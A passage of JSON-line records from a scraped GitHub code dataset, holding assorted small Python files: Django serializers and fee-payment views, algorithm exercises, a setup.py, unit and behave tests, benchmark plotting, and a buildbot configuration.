100/First/49.groupAnagrams.py","file_name":"49.groupAnagrams.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25800633878","text":"from django.contrib.auth.models import User\nfrom .models import UserData\nfrom rest_framework import serializers\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['id', 'username', 'email', 'first_name']\n\n\nclass UserDataSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserData\n fields = ['detail', 'slug']\n\n def create(self, validated_data):\n user_data = UserData.objects.update_or_create(\n user_id=validated_data.get('user_id', None),\n slug=validated_data.get('slug', None),\n defaults={'detail': validated_data.get('detail')}\n )\n return user_data\n","repo_name":"nikorgl/toddlearn","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13603759618","text":"n, k, m = map(int, input().split())\nif k < m or k > n:\n print(0)\nelse:\n details = 0\n balance = 
0\n new_details = 0\n while n >= k:\n q_blanks = n // k\n mass_blanks = q_blanks * k\n balance += n - mass_blanks\n q_details = k // m * q_blanks\n new_details += q_details\n mass_details = q_details * m\n balance += q_blanks * k - mass_details\n n = balance\n balance = 0\n print(new_details)\n","repo_name":"Alset-Nikolas/Algorithm_training_1","sub_path":"июнь 2021, занятие 1/g. Детали.py","file_name":"g. Детали.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3904684946","text":"import os\nimport sys\nimport ast\nimport site\nfrom io import open\n\nfrom setuptools import setup\n\n# See https://github.com/pypa/pip/issues/7953\nsite.ENABLE_USER_SITE = \"--user\" in sys.argv[1:]\n\nself_path = os.path.dirname(os.path.realpath(__file__))\n\nwith open(\n os.path.join(self_path, \"dffml_model_scratch\", \"version.py\"), \"r\"\n) as f:\n for line in f:\n if line.startswith(\"VERSION\"):\n version = ast.literal_eval(line.strip().split(\"=\")[-1].strip())\n break\n\nwith open(os.path.join(self_path, \"README.md\"), \"r\", encoding=\"utf-8\") as f:\n readme = f.read()\n\nsetup(\n name=\"dffml-model-scratch\",\n version=version,\n description=\"\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n author=\"Yash Lamba\",\n author_email=\"yashlamba2000@gmail.com\",\n maintainer=\"John Andersen\",\n maintainer_email=\"john.s.andersen@intel.com\",\n url=\"https://github.com/intel/dffml/blob/main/model/scratch/README.md\",\n license=\"MIT\",\n keywords=[\"dffml\"],\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n ],\n entry_points={\n \"dffml.model\": [\n \"scratchlgrsag = dffml_model_scratch.logisticregression:LogisticRegression\",\n \"anomalydetection = dffml_model_scratch.anomalydetection:AnomalyModel\",\n ],\n \"dffml.accuracy\": [\n \"anomalyscore = dffml_model_scratch.anomaly_detection_scorer:AnomalyDetectionAccuracy\",\n ],\n },\n)\n","repo_name":"intel/dffml","sub_path":"model/scratch/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"72"} +{"seq_id":"14340093323","text":"import sys\nsys.path.append(\"../\")\n\nimport unittest\nimport label\n\n\n\nclass TestSequenceFunctions(unittest.TestCase):\n\n def test_create_label_functions(self):\n #inputs\n node_names = ['a', 'b', 'c']\n data = \"\"\"\n none = not a and not b and not c\n ab = a and b\n c = c\n \"\"\"\n\n functions = label.create_label_functions(node_names, data)\n self.assertEqual(functions['none']([0,0,0]), True)\n self.assertEqual(functions['ab']([1,1,0]), True)\n self.assertEqual(functions['c']([0,0,1]), True)\n self.assertEqual(functions['none']([1,0,1]), False)\n\n\n def test_label_state(self):\n #inputs\n node_names = ['a', 'b', 'c']\n data = \"\"\"\n none = not a and not b and not c\n ab = a and b\n c = c\n \"\"\"\n states = [\"000\", \"001\", \"100\", \"101\", \"110\", \"111\"]\n labels = ['none', 'c', '', 'c', 'ab', 'c/ab']\n\n 
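Condensed restatement of the recycling loop in the blanks/details record above: n kg of metal yields k-kg blanks, each blank yields k//m details, and all offcuts (unused metal plus per-blank scrap) are melted down and fed back until less than one blank's worth remains.

def count_details(n, k, m):
    if m > k or k > n:
        return 0
    details = 0
    while n >= k:
        blanks = n // k
        per_blank = k // m
        details += blanks * per_blank
        # leftover = metal not cut into blanks + scrap left in each blank
        n = (n - blanks * k) + blanks * (k - per_blank * m)
    return details

print(count_details(100, 7, 2))  # 48 details from 100 kg, 7 kg blanks, 2 kg details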
functions = label.create_label_functions(node_names, data)\n for s, l in zip(states, labels):\n self.assertEqual(label.label_state(s, functions), l)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"mar-esther23/regnet","sub_path":"regnet/test/test_label.py","file_name":"test_label.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31505238869","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport logging\nimport subprocess\nimport argparse\n\ndef shell(cmd, quiet=False):\n if not quiet:\n logging.debug(f' shell: {cmd}')\n result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout\n try:\n result = result.decode().strip()\n except:\n pass\n if result and not quiet:\n logging.debug(f' result: {result}')\n return result\n\ndef generate_plot_imb(datapath_native, datapath_wasm, path_to_save):\n for _, dirnames, filenames in os.walk(datapath_native):\n for dir in dirnames:\n for _, benchname, filenames in os.walk(os.path.join(datapath_native, dir)):\n for bench in benchname:\n # for file in filenames: \n logging.info(f'Benchmark: {bench}')\n for _, _, datafiles in os.walk(os.path.join(datapath_native, dir, bench)):\n # print(datafiles[0])\n df_imb_native = pd.read_csv(os.path.join(datapath_native, dir, bench, datafiles[0]), index_col=False)\n df_imb_wasm = pd.read_csv(os.path.join(datapath_wasm, dir, bench, datafiles[0]), index_col=False)\n create_dir_path = path_to_save + \"/\" + bench\n # print(create_dir_path)\n shell(f'mkdir -p {create_dir_path}')\n # print(os.path.join(datapath_native, dir, bench, datafiles[0]))\n # print(os.path.join(datapath_wasm, dir, bench, datafiles[0]))\n \n fig, ax = plt.subplots()\n ax.plot(df_imb_native['bytes'], df_imb_native['t_avg_us'], label='Native')\n ax.plot(df_imb_wasm['bytes'], df_imb_wasm['t_avg_us'], label='Wasm')\n plt.xlabel('Bytes')\n plt.ylabel('Iteration Time')\n plt.title(f'{bench}')\n plt.legend()\n save_path = create_dir_path + \"/\" + bench + \".png\"\n # print(save_path)\n plt.savefig(save_path, dpi=300) \n\n\n#Create plots for HPCG, IS, and IMB\ndef create_plots(dirpath):\n \n shell(\"mkdir -p Plots\")\n shell(\"mkdir -p Plots/HPCG\")\n shell(\"mkdir -p Plots/IS\")\n shell(\"mkdir -p Plots/IMB\")\n shell(\"mkdir -p Plots/IMB/4_proc\")\n shell(\"mkdir -p Plots/IMB/8_proc\")\n\n data_path_native = os.path.join(dirpath, \"native\")\n data_path_wasm= os.path.join(dirpath, \"wasm\")\n logging.info(f'Generating plots for HPCG')\n \n df_hpcg_native = pd.read_csv(os.path.join(data_path_native, \"HPCG/native.csv\"), index_col=False)\n df_hpcg_wasm = pd.read_csv(os.path.join(data_path_wasm, \"HPCG/wasm.csv\"), index_col=False)\n\n fig, ax = plt.subplots()\n ax.plot(df_hpcg_native['nproc'], df_hpcg_native['gflop_per_s'], label='Native')\n ax.plot(df_hpcg_wasm['nproc'], df_hpcg_wasm['gflop_per_s'], label='Wasm')\n plt.xlabel('Number of MPI Processes')\n plt.ylabel('Gflop/s')\n plt.legend()\n plt.savefig(\"Plots/HPCG/hpcg_flops.png\", dpi=300) \n \n fig, ax = plt.subplots()\n ax.plot(df_hpcg_native['nproc'], df_hpcg_native['gb_per_s'], label='Native')\n ax.plot(df_hpcg_wasm['nproc'], df_hpcg_wasm['gb_per_s'], label='Wasm')\n plt.xlabel('Number of MPI Processes')\n plt.ylabel('Bandwidth (GB/s)')\n plt.legend()\n plt.savefig(\"Plots/HPCG/hpcg_bandwidth.png\", dpi=300) \n\n logging.info(f'Generating plots for IS')\n\n df_is_native = 
pd.read_csv(os.path.join(data_path_native, \"IS/native.csv\"), index_col=False)\n df_is_wasm = pd.read_csv(os.path.join(data_path_wasm, \"IS/wasm.csv\"), index_col=False)\n\n # print(df_is_native)\n fig, ax = plt.subplots()\n\n ax.plot(df_is_native['nproc'], df_is_native['mop_per_s'], label='Native')\n ax.plot(df_is_wasm['nproc'], df_is_wasm['mop_per_s'], label='Wasm')\n plt.xlabel('Number of MPI Processes')\n plt.ylabel('Mop/s')\n plt.legend()\n plt.savefig(\"Plots/IS/is_mops.png\", dpi=300) \n \n logging.info(f'Generating plots for IMB')\n generate_plot_imb(os.path.join(data_path_native, \"IMB/4_proc\"), os.path.join(data_path_wasm, \"IMB/4_proc\"), \"Plots/IMB/4_proc\")\n generate_plot_imb(os.path.join(data_path_native, \"IMB/8_proc\"), os.path.join(data_path_wasm, \"IMB/8_proc\"), \"Plots/IMB/8_proc\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--dir', type=str)\n args = parser.parse_args()\n create_plots(args.dir)\n ","repo_name":"kky-fury/MPIWasm","sub_path":"wasi-mpi-rs/Plots/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"19757395544","text":"#PROBLEM 3-PYTHON\r\nimport numpy as np\r\ndef PROBLEM3(A):\r\n for n in range(len(A)):\r\n B= np.polyfit(A[:,0],A[:,1],n)\r\n C = np.polyval(B, A[:,0])\r\n D = np.linalg.norm(A[:,1] - C)\r\n x = [n,D]\r\n if n==0:\r\n y = x\r\n elif y[1] >= x[1]:\r\n z = x[0]\r\n D = np.polyfit(A[:,0],A[:,1],z)\r\n print('Coefficients: ',D) \r\nprint(\"nx2 Matrix is needed;hence,the number of rows is needed\")\r\nrows = int(input(\"Enter the number of rows:\")) \r\ncolumns =2 \r\nprint(\"Please enter the values of the elements of the matrix:\")\r\nprint(\"NOTE: Use space when inputting values EX. 1 2 3 4\")\r\nVALUES = list(map(int, input().split())) \r\nMX = np.array(VALUES).reshape(rows, columns)\r\nprint(\"ANSWER:\")\r\nPROBLEM3(MX)\r\n","repo_name":"ralphy1003/MP_PROBLEM3-PYTHON","sub_path":"PROBLEM3.py","file_name":"PROBLEM3.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27752387678","text":"import sys\r\nsys.setrecursionlimit(10000)\r\ninput = sys.stdin.readline\r\n\r\ndef dfs(graph, v, visited):\r\n visited.add(v)\r\n for i in graph[v]:\r\n if i not in visited:\r\n dfs(graph, i, visited)\r\n stack.append(v)\r\n\r\ndef dfs2(graph2, v, visited):\r\n visited.add(v)\r\n tmp.append(v)\r\n for i in graph2[v]:\r\n if i not in visited:\r\n dfs2(graph2, i, visited)\r\n\r\n\r\nV, E = map(int, input().split())\r\n\r\ngraph = [[] for _ in range(V+1)]\r\ngraph2 = [[] for _ in range(V+1)]\r\nstack = []\r\nfor _ in range(E):\r\n a, b = map(int, input().split())\r\n graph[a].append(b)\r\n graph2[b].append(a)\r\nvisited = set()\r\nfor k in range(1,V+1):\r\n if k not in visited:\r\n dfs(graph, k, visited)\r\n# print(stack)\r\n\r\nans = []\r\nvisited = set()\r\nwhile stack:\r\n k = stack.pop()\r\n if k in visited:\r\n continue\r\n tmp = []\r\n dfs2(graph2, k, visited)\r\n ans.append(sorted(tmp))\r\nprint(len(ans))\r\nfor i in sorted(ans):\r\n print(*i,-1)","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Platinum/2150. 
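The PROBLEM3 record above searches polynomial degrees for the fit with the smallest least-squares residual; a tidier restatement with illustrative points. Note that on noisy data the raw residual norm is minimized by the highest degree tried, so this criterion tends to select the interpolating (overfit) polynomial, in the original code as well as here.

import numpy as np

pts = np.array([[0.0, 1.1], [1.0, 1.9], [2.0, 5.2], [3.0, 9.8], [4.0, 17.1]])
x, y = pts[:, 0], pts[:, 1]

best_norm, best_deg = min(
    (np.linalg.norm(y - np.polyval(np.polyfit(x, y, n), x)), n)
    for n in range(len(pts))
)
# With 5 points, degree 4 interpolates exactly, so best_deg lands on 4.
print(best_deg, np.polyfit(x, y, best_deg))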
Strongly Connected Component/Strongly Connected Component.py","file_name":"Strongly Connected Component.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8809969704","text":"'''\n계수정렬 O(N+K)\n1. N이 100만아래면 용이하게 사용가능\n2. 제일큰수와 가장 작은수가 차이가 작으면 좋다.\n-> 배열을 N까지 선언하고 개수를 세기 때문이다.\n\n동일한 값을 가지는 데이터가 여러개 등장할 때 효과적\nex) 성적 0~100점이면서, 범위가 짧고 동일한 학생많으니까.\n'''\narray = [1,5,2,7,4,10,9,2,1,0,6,8,9,14]\ncount = [0] * ((max(array)+1))\n\nfor i in range(len(array)):\n count[array[i]] += 1\n\n# 1-몇개 2-몇개\nfor i in range(len(count)):\n for j in range(count[i]):\n print(i, end=' ')\n\n\n","repo_name":"Minsik113/Algorithm-practice","sub_path":"[책]이것이코딩테스트다/4_정렬/00_계수.py","file_name":"00_계수.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35224220262","text":"# -*- coding: utf-8 -*-\n\nfrom typing import List\nfrom typing import Optional\n\nfrom veld.core.streamed_variance import StreamedVariance\n\nfrom ._base import VeldCommand\n\n\nclass StandardDeviationCommand(VeldCommand):\n def __init__(self):\n super().__init__(\n name=\"stdev\",\n title=\"Compute the standard deviation of the input stream\",\n extra_sections={\n \"NOTES\": (\n \"1. https://en.wikipedia.org/wiki/Standard_deviation#Uncorrected_sample_standard_deviation\"\n )\n },\n )\n\n def register(self):\n super().register()\n self.add_argument(\n \"-p\",\n \"--population\",\n help=\"Compute the population standard deviation\",\n description=(\n \"By default the Veld stdev command computes an unbiased \"\n \"estimator of the sample standard deviation. If the data \"\n \"stream constitutes the entirety of a finite population, \"\n \"then you can use this flag to compute the uncorrected \"\n \"population standard deviation [1].\"\n ),\n action=\"store_true\",\n )\n\n def handle(self) -> int:\n svs = None # type: Optional[List[StreamedVariance]]\n\n for values in self.default_stream_processor:\n if svs is None:\n svs = [\n StreamedVariance(population=self.args.population)\n for _ in range(len(values))\n ]\n\n for i in range(len(values)):\n svs[i].update(values[i])\n\n svs = [] if svs is None else svs\n variances = [sv.stdev for sv in svs]\n print(self.args.separator.join(map(str, variances)))\n return 0\n","repo_name":"GjjvdBurg/Veld","sub_path":"veld/console/commands/stdev.py","file_name":"stdev.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41544507261","text":"\nimport csv\nimport glob\nimport pandas as pd\nfrom nltk import tokenize, re\nimport data_prep.py\n\ndef sentence2word(inputFile,outputFile):\n\n with open(inputFile) as dataFile:\n sentences = dataFile.read().splitlines()\n\n rows = []\n for sentence in sentences:\n row = []\n row.append(sentence); row.append('Sentence'); rows.append(row)\n row = []\n row.append('BOS'); row.append('BOS'); rows.append(row)\n\n # split sentence into words and punctuations\n words = re.findall(r\"[\\w']+|[().,!?;]\", sentence)\n for word in words:\n row = []\n row.append(word)\n row.append('O')\n rows.append(row)\n row = []\n row.append('EOS'); row.append('EOS'); rows.append(row)\n\n with open(outputFile,'w') as w:\n writer = csv.writer(w)\n writer.writerows(rows)\n print('Done: sentence text to word+\\'O\\' csv')\n \n# write each thread into a line, and merge all files into one file\npath = 
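Restatement of the counting-sort record above that returns a list instead of printing inside the nested loop; it stays O(N + K) for N values in the range [0, K]:

def counting_sort(values):
    count = [0] * (max(values) + 1)
    for v in values:
        count[v] += 1          # tally each value
    out = []
    for v, c in enumerate(count):
        out.extend([v] * c)    # emit each value count[v] times
    return out

print(counting_sort([1, 5, 2, 7, 4, 10, 9, 2, 1, 0]))
# [0, 1, 1, 2, 2, 4, 5, 7, 9, 10]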
'./data/medhelp_disease/*.txt'\nfiles = glob.glob(path)\nresultList = []\nfor fileName in files:\n with open(fileName) as data:\n sentences = data.read().splitlines()\n\n tempStr = \"\"\n for i in range(0, len(sentences)-1):\n if \"Content:\" in sentences[i]:\n tempStr += sentences[i]\n if \"User0:\" in sentences[i+1]:\n resultList.append(tempStr)\n tempStr = \"\"\n resultList.append(tempStr)\n\nf = open('./data/medhelp_disease_all.txt', 'w')\nf.writelines([\"%s\\n\" % result for result in resultList])\nprint(\"Done\")\n\n# ## split text into sentence by sentence, using NLTK\n# open input file, read all columns, address unexpected letters\nfp = open(\"./data/medhelp_disease_all.txt\")\ndata = fp.read()\n# data = unicode(data, errors='ignore')\n\n# tokenize text into sentences, using nltk\nsentences = tokenize.sent_tokenize(data)\nprint(len(sentences))\n\n# write generated list of strings into txt file\nfile = open('./data/medhelp_disease_sentence.txt', 'w')\nfile.writelines([\"%s\\n\" % sentence for sentence in sentences])\nprint('Done')\n\nif __name__ == \"__main__\":\n # inputFile = './data/all.txt'\n sentenceFile = './data/all_sentence.txt'\n\n # text2sentence(inputFile,sentenceFile)\n # word2id(sentenceFile)\n\n wordFile = './data/all_word.csv'\n # sentence2word(sentenceFile,wordFile)\n\n with open('./data/label_file_1.csv','w') as f:\n writer = csv.writer(f)\n writer.writerows(bioLists)\n","repo_name":"Missymeng/Drug_Repositioning","sub_path":"dataset_prep.py","file_name":"dataset_prep.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"27353293895","text":"\"\"\"\nThis module contains step definitions for update_student_by_id.feature.\nIt uses the requests package:\nhttp://docs.python-requests.org/\n\"\"\"\nimport requests\nfrom behave import *\n\n# \"Constants\"\nSTUDENT_API = 'http://127.0.0.1:5000/'\n\n\n@when('the update student API is queried with id')\ndef step_impl(context):\n first_row = context.table[0]\n params = {'id': first_row['id'], 'class': first_row['class']}\n context.response = requests.put(STUDENT_API, params=params)\n\n\n@then('the response status code is \"{code:d}\"')\ndef step_impl(context, code):\n assert context.response.status_code == code\n","repo_name":"ketan55patil/student_enrollment_api","sub_path":"features/steps/update_student_by_id.py","file_name":"update_student_by_id.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18249650456","text":"#!/usr/bin/env python3\nimport numpy as np\nimport cv2\nfrom datetime import datetime\n\n\ndef put_text(image, text):\n font_size = 1.0\n font_type = cv2.FONT_HERSHEY_PLAIN\n font_color = (0xff, 0xf, 0xff)\n cv2.putText(image, text, (460, 15), font_type, font_size, font_color)\n \n\nimage = cv2.imread(\"/tmp/tmp.jpg\")\n\ntnow = datetime.now().strftime('%Y%m%d_%H_%M_%S') # ('%Y%m%d_%H_%M_%S_%f')\nput_text(image, tnow)\ncv2.imshow('test', image)\n\n\nwhile(True):\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncv2.destroyAllWindows()\n\nprint(\"Done.\")\n","repo_name":"amiged/THBox","sub_path":"src/put_text.py","file_name":"put_text.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15453325611","text":"from master import master_config\nfrom master.factory import chromium_factory\n\ndefaults = {}\n\nhelper = 
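Focused view of the tokenization rule the `sentence2word` writer above depends on: the regex keeps words (apostrophes included) as single tokens and splits the listed punctuation into separate tokens, each then paired with the default 'O' label.

import re

sentence = "I can't sleep, doctor."
tokens = re.findall(r"[\w']+|[().,!?;]", sentence)
rows = [(tok, "O") for tok in tokens]
print(rows)
# [('I', 'O'), ("can't", 'O'), ('sleep', 'O'), (',', 'O'), ('doctor', 'O'), ('.', 'O')]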
master_config.Helper(defaults)\nB = helper.Builder\nF = helper.Factory\nS = helper.Scheduler\nT = helper.Triggerable\n\n\ndef win():\n return chromium_factory.ChromiumFactory('src/build', 'win32')\ndef winXpTester():\n return chromium_factory.ChromiumFactory('src/build', 'win32',\n nohooks_on_update=True)\n\nS('win_rel_scheduler', branch='src', treeStableTimer=60)\nT('win_rel_trigger')\n\nchromium_rel_archive = master_config.GetGSUtilUrl('chromium-webrtc',\n 'Win Builder')\ntests = [\n 'webrtc_manual_browser_tests',\n 'webrtc_manual_content_browsertests',\n 'webrtc_content_unittests',\n]\n\ndefaults['category'] = 'win'\n\nB('Win Builder', 'win_rel_factory', scheduler='win_rel_scheduler',\n notify_on_missing=True)\nF('win_rel_factory', win().ChromiumWebRTCFactory(\n slave_type='Builder',\n target='Release',\n options=['--compiler=goma', '--', 'chromium_builder_webrtc'],\n compile_timeout=2400,\n factory_properties={'trigger': 'win_rel_trigger',\n 'build_url': chromium_rel_archive,}))\n\nB('WinXP Tester', 'win_xp_tester_factory', scheduler='win_rel_trigger')\nF('win_xp_tester_factory', winXpTester().ChromiumWebRTCFactory(\n slave_type='Tester',\n build_url=chromium_rel_archive,\n tests=tests,\n factory_properties={\n 'show_perf_results': True,\n 'halt_on_missing_build': True,\n 'perf_id': 'chromium-webrtc-rel-xp',\n 'process_dumps': True,\n 'start_crash_handler': True,\n }))\n\nB('Win7 Tester', 'win_7_tester_factory', scheduler='win_rel_trigger')\nF('win_7_tester_factory', win().ChromiumWebRTCFactory(\n slave_type='Tester',\n build_url=chromium_rel_archive,\n tests=tests,\n factory_properties={\n 'show_perf_results': True,\n 'halt_on_missing_build': True,\n 'perf_id': 'chromium-webrtc-rel-7',\n 'process_dumps': True,\n 'start_crash_handler': True,\n }))\n\nB('Win8 Tester', 'win_8_tester_factory', scheduler='win_rel_trigger')\nF('win_8_tester_factory', win().ChromiumWebRTCFactory(\n slave_type='Tester',\n build_url=chromium_rel_archive,\n tests=tests,\n factory_properties={\n 'show_perf_results': True,\n 'halt_on_missing_build': True,\n 'perf_id': 'chromium-webrtc-rel-win8',\n 'process_dumps': True,\n 'start_crash_handler': True,\n }))\n\n\ndef Update(config, active_master, c):\n helper.Update(c)\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/masters/master.chromium.webrtc/master_win_cfg.py","file_name":"master_win_cfg.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"5769309378","text":"import json\r\nfrom django.shortcuts import render,redirect\r\nfrom .models import Stud_PD,Stud_Admn,Fee_Str,Fee_Record,Stud_Fees\r\nfrom django.shortcuts import get_list_or_404,get_object_or_404\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom . 
import forms\r\nfrom django.http import HttpResponse\r\n\r\n@login_required(login_url=\"/accounts/login/\")\r\ndef stud_pd_entry(request):\r\n\r\n if request.is_ajax():\r\n stud_pds = Stud_PD.objects.all()\r\n stud_admns = Stud_Admn.objects.all()\r\n usnList = []\r\n for s in stud_pds:\r\n usnList.append(s.USN)\r\n adNoList = []\r\n for a in stud_admns:\r\n adNoList.append(a.Adm_No)\r\n data = [usnList, adNoList]\r\n data = json.dumps(data)\r\n return HttpResponse(data, content_type='application/json')\r\n\r\n if request.method == 'POST':\r\n form1 = forms.create_stud_pd(request.POST)\r\n form2 = forms.create_stud_admn(request.POST)\r\n if form1.is_valid()&form2.is_valid():\r\n instance1 = form1.save(commit=False)\r\n instance1.Added_by = request.user\r\n instance1.save()\r\n instance2 = form2.save(commit=False)\r\n try:\r\n fee_foreign = Fee_Str.objects.get(Course=request.POST['Course'],Branch=request.POST['Branch'],Adm_Year=request.POST['Adm_Year'],Adm_type=request.POST['Adm_Type'],Quota=request.POST['Quota']) \r\n except:\r\n fee_foreign = Fee_Str.objects.get(Fid=1)\r\n else:\r\n instance2.Fid = fee_foreign \r\n instance2.Sid = instance1 \r\n instance2.save()\r\n instance3 = Stud_Fees.objects.create(Adm_No_S=instance2,Total=fee_foreign.Total,Due=fee_foreign.Total)\r\n instance3.save()\r\n return redirect('details:list')\r\n else: \r\n form1 = forms.create_stud_pd()\r\n form2 = forms.create_stud_admn()\r\n return render(request, 'entry/createstudpd.html',{'form1':form1,'form2':form2})\r\n\r\n@login_required(login_url=\"/accounts/login/\")\r\ndef update_stud_fee(request,usn): \r\n\r\n if request.is_ajax():\r\n stud_pd = Stud_PD.objects.get(USN=usn)\r\n stud_ad = Stud_Admn.objects.get(Sid=stud_pd.Sid)\r\n fee_str = Fee_Str.objects.get(Fid=str(stud_ad.Fid))\r\n stud_fee = Stud_Fees.objects.get(Adm_No_S=stud_ad.Adm_No)\r\n data = json.dumps(stud_fee.Due)\r\n return HttpResponse(data, content_type='application/json')\r\n\r\n if request.method == 'POST':\r\n stud_pd = Stud_PD.objects.get(USN=usn)\r\n stud_ad = Stud_Admn.objects.get(Sid=stud_pd.Sid)\r\n fee_str = Fee_Str.objects.get(Fid=str(stud_ad.Fid))\r\n stud_fee = Stud_Fees.objects.get(Adm_No_S=stud_ad.Adm_No)\r\n try:\r\n amt=int(request.POST.get('amt',0))\r\n except:\r\n amt=0\r\n if(amt):\r\n if amt>0:\r\n if amt<=stud_fee.Due:\r\n if(amt):\r\n if stud_fee.Apti_1_Paid!=fee_str.Apti_1:\r\n if amt>=fee_str.Apti_1:\r\n stud_fee.Apti_1_Paid=fee_str.Apti_1\r\n amt=amt-fee_str.Apti_1\r\n elif (amt+stud_fee.Apti_1_Paid)>=fee_str.Apti_1:\r\n amt=amt+stud_fee.Apti_1_Paid-fee_str.Apti_1\r\n stud_fee.Apti_1_Paid=fee_str.Apti_1\r\n else:\r\n stud_fee.Apti_1_Paid+=amt\r\n amt=0 \r\n \r\n if(amt):\r\n if stud_fee.Tech_2_Paid!=fee_str.Tech_2:\r\n if amt>=fee_str.Tech_2:\r\n stud_fee.Tech_2_Paid=fee_str.Tech_2\r\n amt=amt-fee_str.Tech_2\r\n elif (amt+stud_fee.Tech_2_Paid)>=fee_str.Tech_2:\r\n amt=amt+stud_fee.Tech_2_Paid-fee_str.Tech_2\r\n stud_fee.Tech_2_Paid=fee_str.Tech_2\r\n else :\r\n stud_fee.Tech_2_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Book_3_Paid!=fee_str.Book_3:\r\n if amt>=fee_str.Book_3:\r\n stud_fee.Book_3_Paid=fee_str.Book_3\r\n amt=amt-fee_str.Book_3\r\n elif (amt+stud_fee.Book_3_Paid)>=fee_str.Book_3:\r\n amt=amt+stud_fee.Book_3_Paid-fee_str.Book_3\r\n stud_fee.Book_3_Paid=fee_str.Book_3\r\n else:\r\n stud_fee.Book_3_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.IndP_4_Paid!=fee_str.IndP_4:\r\n if amt>=fee_str.IndP_4:\r\n stud_fee.IndP_4_Paid=fee_str.IndP_4\r\n amt=amt-fee_str.IndP_4\r\n elif 
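The AJAX branch of `stud_pd_entry` above serializes by hand with `json.dumps` plus `HttpResponse`. Django's built-in `JsonResponse` does the same in one call; a sketch with a hypothetical `stud_ids` view over the record's own models (`safe=False` is required because the payload is a list, not a dict).

```python
from django.http import JsonResponse

def stud_ids(request):
    # values_list avoids the manual accumulation loops in the record.
    usn_list = list(Stud_PD.objects.values_list('USN', flat=True))
    ad_no_list = list(Stud_Admn.objects.values_list('Adm_No', flat=True))
    # Equivalent to json.dumps(...) + HttpResponse(content_type='application/json').
    return JsonResponse([usn_list, ad_no_list], safe=False)
```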
(amt+stud_fee.IndP_4_Paid)>=fee_str.IndP_4:\r\n amt=amt+stud_fee.IndP_4_Paid-fee_str.IndP_4\r\n stud_fee.IndP_4_Paid=fee_str.IndP_4\r\n else:\r\n stud_fee.IndP_4_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.IndV_5_Paid!=fee_str.IndV_5:\r\n if amt>=fee_str.IndV_5:\r\n stud_fee.IndV_5_Paid=fee_str.IndV_5\r\n amt=amt-fee_str.IndV_5\r\n elif (amt+stud_fee.IndV_5_Paid)>=fee_str.IndV_5:\r\n amt=amt+stud_fee.IndV_5_Paid-fee_str.IndV_5\r\n stud_fee.IndV_5_Paid=fee_str.IndV_5\r\n else:\r\n stud_fee.IndV_5_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Inte_6_Paid!=fee_str.Inte_6:\r\n if amt>=fee_str.Inte_6:\r\n stud_fee.Inte_6_Paid=fee_str.Inte_6\r\n amt=amt-fee_str.Inte_6\r\n elif (amt+stud_fee.Inte_6_Paid)>=fee_str.Inte_6:\r\n amt=amt+stud_fee.Inte_6_Paid-fee_str.Inte_6\r\n stud_fee.Inte_6_Paid=fee_str.Inte_6\r\n else:\r\n stud_fee.Inte_6_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Libr_7_Paid!=fee_str.Libr_7:\r\n if 